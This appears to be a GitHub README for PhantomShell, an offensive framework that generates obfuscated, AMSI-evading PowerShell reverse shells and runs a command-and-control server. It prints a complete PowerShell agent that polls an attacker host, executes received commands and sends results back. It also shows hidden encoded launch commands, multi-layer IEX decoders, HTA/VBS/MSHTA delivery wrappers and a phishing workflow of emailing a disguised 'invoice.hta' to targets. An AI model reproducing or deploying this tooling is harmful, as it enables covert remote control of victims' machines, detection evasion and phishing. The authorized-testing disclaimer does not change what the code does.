-
Notifications
You must be signed in to change notification settings - Fork 3
PhantomShell Core
PhantomShell is a comprehensive red-team framework designed for authorized penetration testing and adversary simulation. It combines an advanced PowerShell payload generator with a unified Command & Control (C2) infrastructure.
The tool automates the entire red-team workflow:
- Generate โ Obfuscated, AMSI-evading PowerShell payloads
- Deploy โ Via multiple delivery formats (PowerShell, CMD, HTA, VBS, MSHTA)
- Control โ Through a unified C2 server with Web UI and CLI interfaces
- Manage โ TCP reverse shells and HTTP/S agents simultaneously
| Feature | PhantomShell | Traditional Tools |
|---|---|---|
| Unified C2 | โ TCP + HTTP agents | โ Separate tools |
| Multi-layer Encoding | โ Up to 3 layers | โ Single layer |
| Polymorphic Payloads | โ Random variable names | โ Static |
| Multiple Formats | โ 5+ delivery formats | โ Limited |
| Web Dashboard | โ Real-time session management | โ CLI only |
| HTTP Agent Support | โ Firewall-friendly | โ TCP only |
| Payload Hosting | โ Built-in HTTP server | โ Manual |
No tool can guarantee complete evasion. PhantomShell helps bypass signature-based detection but cannot evade all defensive mechanisms.
| Technique | What it Evades | Limitations |
|---|---|---|
| Variable Renaming | Static signatures | Behavioral detection |
| Multi-layer Encoding | Shallow analysis | Deep sandboxing |
| Base64 Obfuscation | Plain-text scanning | Runtime AMSI |
| Polymorphism | Hash-based detection | AI/Behavioral EDR |
| IP/Port Hiding | Pattern matching | Network monitoring |
| HTTP Agent | Firewall rules | SSL inspection |
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -o random -l 3 --enc-b64This combines:
- Random variable names (different every run)
- 3 layers of encoding
- Base64 IP/port hiding
- No static signatures
- โ Multi-layer PowerShell encoding (1-3 layers)
- โ AMSI-aware payload structure
- โ Polymorphic payload generation (randomized variables)
- โ Base64 obfuscation for IP/port hiding
- โ 5 delivery formats: PowerShell, CMD, HTA, VBS, MSHTA
- โ 3 obfuscation profiles: Minimal, Aggressive, Random
- โ Payload verification before output
- โ Layer round-trip verification
- โ Unified C2 server supporting TCP and HTTP agents
- โ Web dashboard with real-time session management
- โ CLI operator shell for direct control
- โ Multi-session handling (TCP + HTTP simultaneously)
- โ Session persistence and monitoring
- โ Command queuing for HTTP agents
- โ Real-time logs and event tracking
- โ
One-command deployment (
servecommand) - โ Polymorphic generation (multiple variants)
- โ HTTP payload hosting with download cradles
- โ Session type differentiation (TCP vs HTTP)
- โ Quick commands for common tasks
- โ Command history in Web UI
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ TARGET MACHINE โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ TCP Reverse โ โ HTTP Agent (Polling) โ โ
โ โ Shell Payload โ โ - Beacon every 3-5 secs โ โ
โ โ - Interactive โ โ - Command queuing โ โ
โ โ - Real-time โ โ - Firewall-friendly โ โ
โ โโโโโโโโโโฌโโโโโโโโโ โโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโ โ
โ โ โ โ
โ โ TCP (4444) โ HTTP (8081) โ
โ โผ โผ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
โผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ PHANTOMSHELL C2 SERVER โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ TCP โ โ HTTP โ โ Web UI โ โ
โ โ Listener โ โ Listener โ โ - Session manager โ โ
โ โ (4444) โ โ (8081) โ โ - Command exec โ โ
โ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ โ - Real-time logs โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ Unified Session Manager โ โ
โ โ - TCP sessions โ โ
โ โ - HTTP agent sessions โ โ
โ โ - Command queuing for HTTP โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ CLI Interface โ โ
โ โ - Interactive shell - Session management โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
No external dependencies required! PhantomShell uses only Python standard library.
# Clone the repository
git clone https://github.com/Red-Parakeet/PhantomShell.git
# Navigate to directory
cd PhantomShell
# Make executables
chmod +x phantomshell.py
chmod +x phantomc2.py
# Verify installation
python3 phantomshell.py --help
python3 phantomc2.py --help- Python 3.6+ (any platform)
- No additional packages needed
- Works on Linux, macOS, and Windows
# One command generates payload AND starts C2 server
python3 phantomshell.py serve -i 10.10.10.5 -p 4444 --host-payload --start-c2 --password RedTeam2026
# Copy the generated payload
# Paste on target machine
# Shell connects back automatically!Terminal 1 โ Start C2 Server
python3 phantomc2.py --port 4444 --http-port 8081 --web-port 8080 --password RedTeam2026Terminal 2 โ Generate Payload
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444Target โ Execute Payload
# Copy the output from Terminal 2 and paste here
powershell -NoP -sta -NonI -W Hidden -enc <payload>Access Web UI: http://localhost:8080 (or http://10.10.10.5:8080 from other machines)
Password: RedTeam2026
python3 phantomshell.py revshell -i <IP> -p <PORT> [OPTIONS]| Flag | Short | Description | Default |
|---|---|---|---|
--attacker-ip |
-i |
Attacker IP address | Required |
--port |
-p |
Listening port | Required |
--obf-profile |
-o |
minimal / aggressive / random
|
aggressive |
--layers |
-l |
Encoding layers (1-3) | 1 |
--format |
-f |
Output format | powershell |
--enc-b64 |
Hide IP/port in base64 | Off | |
--keep-pwd |
Show current directory in prompt | Off | |
--do-not-hide |
Disable hidden window flags | Off | |
--verbose |
-v |
Show decoded payload | Off |
--no-banner |
Hide startup banner | Off |
Examples:
# Basic payload
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444
# Maximum evasion
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -o random -l 3 --enc-b64
# HTA phishing payload
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f hta -l 2
# CMD wrapper
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f cmd
# Verbose mode (see obfuscated payload before encoding)
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -vpython3 phantomshell.py serve -i <IP> -p <PORT> [OPTIONS]| Flag | Short | Description | Default |
|---|---|---|---|
--attacker-ip |
-i |
Attacker IP address | Required |
--port |
-p |
Listening port | Required |
--host |
C2 bind address | 0.0.0.0 |
|
--host-payload |
Host .ps1 file on HTTP server | Off | |
--host-port |
HTTP server port | 8000 |
|
--filename |
Payload filename | Random | |
--start-c2 |
Start phantomc2.py automatically | Off | |
--http-port |
HTTP agent port for phantomc2.py | 8081 |
|
--web-port |
Web UI port for phantomc2.py | 8080 |
|
--password |
Web UI password | phantomshell |
|
--no-cli |
Disable interactive CLI | Off | |
--obf-profile |
-o |
Obfuscation profile | aggressive |
--layers |
-l |
Encoding layers | 1 |
--enc-b64 |
Hide IP/port in base64 | Off | |
--keep-pwd |
Show CWD in prompt | Off | |
--do-not-hide |
Disable hidden window flags | Off | |
--verbose |
-v |
Show decoded payload | Off |
Example:
# Generate payload + host + start C2 with one command
python3 phantomshell.py serve -i 10.10.10.5 -p 4444 --host-payload --start-c2 --password RedTeam2026 -o random -l 2 --enc-b64python3 phantomshell.py polymorph -i <IP> -p <PORT> -n <COUNT>| Flag | Description | Default |
|---|---|---|
-i |
Attacker IP | Required |
-p |
Listening port | Required |
-n |
Number of variants | 3 |
-l |
Encoding layers | 1 |
--enc-b64 |
Hide IP/port | Off |
--keep-pwd |
Show CWD | Off |
--verbose |
Verbose output | Off |
Example:
# Generate 5 unique variants
python3 phantomshell.py polymorph -i 10.10.10.5 -p 4444 -n 5python3 phantomc2.py [OPTIONS]| Flag | Description | Default |
|---|---|---|
--port |
TCP listener port | 4444 |
--http-port |
HTTP agent listener port | 8081 |
--web-port |
Web UI port | 8080 |
--password |
Web UI authentication password | phantomshell |
--no-cli |
Disable interactive CLI | Off |
--no-banner |
Hide startup banner | Off |
Examples:
# Default setup
python3 phantomc2.py --password MySecretPass123
# Custom ports and password
python3 phantomc2.py --port 5555 --http-port 9090 --web-port 8888 --password SecurePass123
# Headless mode (no CLI)
python3 phantomc2.py --password RedTeam2026 --no-cliDirect execution in PowerShell console.
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444Output: powershell -NoP -sta -NonI -W Hidden -enc <base64>
Run from Command Prompt.
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f cmdOutput: cmd /c "powershell -NoP -sta -NonI -W Hidden -enc <base64>"
Phishing-friendly HTML file.
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f hta -l 2Output: Complete HTML file with VBScript wrapper
Usage: Save as .hta and email to target
For Office macro delivery.
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f vbsOutput: VBScript that runs PowerShell hidden
One-liner for quick execution.
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f mshtaOutput: mshta vbscript:CreateObject("WScript.Shell").Run("powershell ...",0,False)(window.close)
Fast and readable, minimal obfuscation.
$client โ $c
$stream โ $st
$bytes โ $b
$data โ $d
More aggressive variable renaming.
$client โ $xA1
$stream โ $xB2
$bytes โ $xC3
$sendback โ $xE5
Fully randomized variable names, different every run.
$client โ $mKpRx
$stream โ $zQ6v8A6
$bytes โ $hySOJ
$data โ $TqRmX9
| Layer | Description | Command |
|---|---|---|
| 1 | UTF-16LE โ Base64 | -l 1 |
| 2 | Base64 wrapped in IEX โ UTF-16LE โ Base64 | -l 2 |
| 3 | Multi-stage decode with variables | -l 3 |
Layer 1:
[System.Convert]::FromBase64String('<base64>')Layer 2:
IEX([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('<base64>')))Layer 3:
$_b=[System.Convert]::FromBase64String('<base64>');
$_s=[System.Text.Encoding]::Unicode.GetString($_b);
IEX($_s)Access the Web UI at http://localhost:8080 (or http://<your-ip>:8080 from other machines)
Features:
- โ Live session list with status indicators
- โ Session statistics (Total, Active, Dead, TCP, HTTP)
- โ Interactive terminal with command history
- โ Quick command buttons for common tasks
- โ Real-time logs with color coding
- โ Session type differentiation (TCP vs HTTP)
- โ Copy-paste friendly interface
Interactive shell for operators:
phantom > help
sessions โ list all sessions
interact <id> โ interact with a session
exec <id> <cmd> โ run single command
kill <id> โ mark session dead
prune โ remove dead sessions
exit โ quit C2 serverExample Interaction:
phantom > sessions
ID TYPE IP USER@HOST STATUS CONNECTED
โโโโ โโโโโโ โโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
1 tcp 10.10.10.20 admin@DESKTOP-ABC123 ALIVE 14:32:15
2 http 10.10.10.30 user@WORKSTATION-XYZ ALIVE 14:35:42
phantom > interact 1
OK Interacting with #1 (admin@DESKTOP-ABC123) [TCP]
Type 'back' to return to C2
PS #1 > whoami
DESKTOP-ABC123\admin
PS #1 > ipconfig
Ethernet adapter Ethernet0:
IPv4 Address. . . . . . . . . . . : 10.10.10.20
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Save as agent.ps1:
$u='http://10.10.10.5:8081'
$id=[guid]::NewGuid().ToString()
$pl='Windows|'+$env:COMPUTERNAME+'|'+$env:USERNAME
while($true){
try{
$c=(iwr -UseBasicParsing ($u+'/beacon?id='+$id+'&platform='+[uri]::EscapeDataString($pl))).Content.Trim()
if($c){
$o=try{iex $c 2>&1|Out-String}catch{$_.Exception.Message}
iwr -UseBasicParsing -Method POST -Uri ($u+'/result?id='+$id) -Body $o|Out-Null
}
}catch{}
Start-Sleep -Seconds (3+(Get-Random -Max 2))
}Run:
powershell -ExecutionPolicy Bypass -File agent.ps1python3 phantomshell.py revshell -i 10.10.10.5 -p 8081 -f cmdPaste directly into CMD on target.
Convert PowerShell scripts to standalone Windows executables.
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f powershellCopy the output and save as payload.ps1.
Important: Must use .ps1 extension.
Use PowerShell to exe/msi Converter (Microsoft Store) or PS2EXE:
# Using PS2EXE (open source)
Install-Module -Name ps2exe -Force
ps2exe -inputFile payload.ps1 -outputFile payload.exe
# Or use GUI tools:
# PowerShell to exe/msi Converter (Microsoft Store)The resulting .exe can be run by double-clicking on Windows systems.
# 1. Generate and host payload with C2
python3 phantomshell.py serve -i 10.10.10.5 -p 4444 --host-payload --start-c2 --password RedTeam2026
# 2. Copy the download cradle or payload
# 3. Execute on target machine
# 4. Session appears in Web UI/CLI
# 5. Interact and execute commands# 1. Generate HTA payload
python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f hta -l 2
# 2. Save as invoice.hta
# 3. Email to target
# 4. Start C2 server
python3 phantomc2.py --password RedTeam2026
# 5. When opened, shell connects back# 1. Start C2 with HTTP listener
python3 phantomc2.py --port 4444 --http-port 8081 --web-port 8080 --password RedTeam2026
# 2. Generate HTTP agent one-liner
python3 phantomshell.py revshell -i 10.10.10.5 -p 8081 -f cmd
# 3. Target runs the CMD command
# 4. Agent polls every 3-5 seconds
# 5. Send commands via Web UI or CLI- โ Use HTTPS with SSL/TLS for production
- โ Firewall restrictions on C2 ports
- โ Strong authentication (complex passwords)
- โ Infrastructure rotation (change IPs/ports)
- โ Log monitoring (detect anomalies)
- โ Encrypted communication between agents
- โ Traffic obfuscation to mimic normal traffic
| Aspect | Recommendation |
|---|---|
| C2 Hosting | VPS with firewall rules |
| Authentication | Strong password + 2FA |
| Communication | HTTPS with valid certificates |
| Logging | Centralized log management |
| Persistence | Multiple C2 fallback addresses |
THIS SOFTWARE IS INTENDED ONLY FOR AUTHORIZED CYBERSECURITY TESTING.
PhantomShell is designed for:
- โ Authorized penetration testing
- โ Red team exercises
- โ Security research
- โ Educational purposes
Unauthorized use may violate:
- Computer Fraud and Abuse Act (CFAA)
- Local and international cybercrime laws
- Corporate security policies
By using this tool, you agree to:
- Use only on systems you own or have written permission to test
- Comply with all applicable laws and regulations
- Accept full responsibility for your actions
- Hold harmless the authors and contributors
The authors assume NO LIABILITY for misuse or damage caused by this tool.
Copyright ยฉ 2026 Red Parakeet Security Team. All Rights Reserved.
Author: Red Parakeet Security Team
GitHub: https://github.com/Red-Parakeet
LinkedIn: https://www.linkedin.com/company/red-parakeet-security/
Website: https://www.redparakeet.org
PhantomShell is dual-licensed:
- Open Source: GNU General Public License v3 - For non-commercial use
- Commercial: PhantomShell Commercial License - For enterprise use
Copyright ยฉ 2026 Red Parakeet Security Team
Red Parakeet Security Team
Offensive Security | Red Teaming
- GitHub: Red Parakeet
- LinkedIn: Red Parakeet
- Website: RedParakeetSec
If PhantomShell helped you, please consider:
- โญ Starring the repository on GitHub
- ๐ข Sharing with fellow security professionals
- ๐ Reporting issues or feature requests
- ๐ค Contributing to the project
| Version | Date | Features |
|---|---|---|
| v2.0 | 2026 | Unified C2, HTTP agents, Web UI, All-in-One deployment |
| v1.0 | 2025 | Initial release, basic payload generation |
PhantomShell | ยฉ 2026 Red Parakeet Security Team | All Rights Reserved